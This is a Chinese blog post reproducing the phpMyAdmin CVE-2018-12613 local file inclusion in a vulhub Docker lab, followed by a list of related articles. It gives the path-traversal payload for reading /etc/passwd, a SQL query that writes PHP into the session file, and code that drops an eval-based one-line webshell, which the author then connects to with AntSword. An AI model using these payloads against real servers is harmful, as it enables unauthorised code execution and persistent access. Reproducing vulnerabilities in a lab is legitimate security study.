复现PHPMyAdmin(CVE-2018-12613)漏洞,并利用漏洞实现上传WebShell

最新推荐文章于 2023-05-01 23:17:24 发布
最新推荐文章于 2023-05-01 23:17:24 发布
阅读量607 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: phpmyadmin cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54713392/article/details/115919298
版权

复现PHPMyAdmin(CVE-2018-12613)漏洞

并利用漏洞实现上传WebShell

漏洞描述:
  在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。 [‘ServerDefault’] = 0“的情况(绕过登录要求,并在没有任何身份验证的情况下运行易受攻击的代码)。

(1)在vulhub中找到PHPmyadmin漏洞环境
在这里插入图片描述

进入CVE-2018-12613,启动环境
执行命令:docker-compose up -d
在这里插入图片描述

(2)查看本机ip,并访问8080端口
在这里插入图片描述在这里插入图片描述

(3)漏洞利用,先进入到容器中
执行命令:docker ps 查询容器ID
执行命令:docker exec -it 216b /bin/bash 进入容器
在这里插入图片描述

使用cat命令查看index.php,存在一个include文件包含函数
在这里插入图片描述

代码含义:
1.判断target是否存在
2.判断target是否是字符串
3.target不能以index字符串开头
4.targer不在$target_blacklist数组中
5.带入targer到Core类的checkPageValidity方法中
$target_blacklist数组有import.php和export.php
Core类的checkPageValidity,进入文件libraries/classes下查看Core.php,分析checkPageValidity方法用法
在这里插入图片描述在这里插入图片描述在这里插入图片描述

这段代码会截取target变量中的字符串从开始到?中的字符,然后带入$whitelist数组中匹配,如果匹配成功,返回true。
可以构造payload:http:127.0.0.1:8080/?target=sql.php?/../../../../../../../../../etc/passwd
可以包含passwd文件
在这里插入图片描述

(4)漏洞利用,利用session写入shell的方式进行getshell,因为在docker中,不能利用写木马到数据库,然后包含frm文件
执行sql语句SELECT "<?php phpinfo();?>
在这里插入图片描述

点击go按钮,执行
在这里插入图片描述

查看session,使用开发人员工具查找存的cookie值
在这里插入图片描述在这里插入图片描述

在docker容器中,进入tmp,查看web服务器下的tmp文件,可以找到上面的session文件
在这里插入图片描述

使用cat打开文件,可以看到代码被插入在文件中
在这里插入图片描述

在web页面访问http://192.168.32.142:8080/?target=sql.php?/../../../../../../../../../tmp/sess_1a39e685485547630fd8036431cbd123
执行了PHP语句
在这里插入图片描述

(5)上传webshell
生成一个一句话木马文件select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST[pass]);?>')?>"
在这里插入图片描述

在docker容器中,查看插入的代码
在这里插入图片描述

使用文件包含,访问:http://192.168.32.142:8080/?target=sql.php?/../../../../../../../../../tmp/sess_1a39e685485547630fd8036431cbd123
在这里插入图片描述

访问cmd.php文件,可以访问,说明一句话木马被成功上传
在这里插入图片描述

(6)使用蚁剑连接一句话木马文件
在这里插入图片描述
在这里插入图片描述

清风-77
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 文件包含(CVE-2014-8959)
千寻的博客
03-07 1667
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
小白也可以看懂的漏洞分析(CVE-2018-12613)
西西弗斯的巨石
05-20 4355
漏洞编号CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。本篇文章主要侧重于对该漏洞的原理进行分析,并给出利用漏洞的方法。并介绍了理解该漏洞的背景知识。
CVE-2018-12613 phpadmin文件包含漏洞
鱼开yk2的博客
10-15 789
网址: https://www.phpmyadmin.net/security/PMASA-2018-4/ 摘要 文件包含和远程执行代码攻击 描述 发现了一个漏洞,攻击者可以在该漏洞中包含(查看并可能执行)服务器上的文件。 该漏洞来自代码的一部分,其中页面在phpMyAdmin中重定向和加载,以及对白名单页面的不正确测试。 除以下情况外,必须对攻击者进行身份验证: $ cfg [‘Allow...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2446
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 612
漏洞
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 550
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin漏洞_CVE20165734 phpmyadmin后台代码执行漏洞复现
weixin_39942191的博客
12-05 298
更多全球网络安全资讯尽在邑安全www.eansec.com0x01 漏洞简介Phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表0x02 漏洞概述(就...
CVE漏洞 phpmyadmin 4.81初识
h0ld1rs的博客
10-28 351
文章目录CVE漏洞漏洞体现漏洞利用漏洞原理 CVE CVE 的英文全称是“Common Vulnerabilities & Exposures”通用漏洞披露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的
CVE-2018-19968 (phpMyAdmin任意文件包含/远程代码执行漏洞)
ranqi666的博客
04-25 977
前言 Transformation是phpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段 ‘Filename’,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击...
漏洞复现-phpmyadmin-文件包含】CVE-2014-8959
10-14 2484
phpmyadmin-文件包含】鸡肋
mysql cve6_phpMyAdmin SQL注入漏洞(CVE-2016-5703)分析
weixin_30498015的博客
02-01 206
0x00.影响版本Version 4.6.x (<4.6.3)Version 4.4.x (<4.4.15.7)0x01.漏洞描述phpMyAdmin是一个web端通用MySQL管理工具,上述版本在central_columns.lib.php文件里的db参数存在sql注入漏洞,攻击者利用漏洞可以获取数据库中敏感信息,甚至可以执行任意命令0x02.测试环境Windows7(X64)+...
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1231
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 840
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
phpMyAdmin历史漏洞复现
lonmar的博客
07-24 1197
简介 phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具。它能够创建和删除数据库,创建/删除/修改表格,删除/编辑/新增字段,执行SQL脚本等 复现三个古老漏洞 phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4
漏洞复现CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 431
漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
CVE-2016-5734
最新发布
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值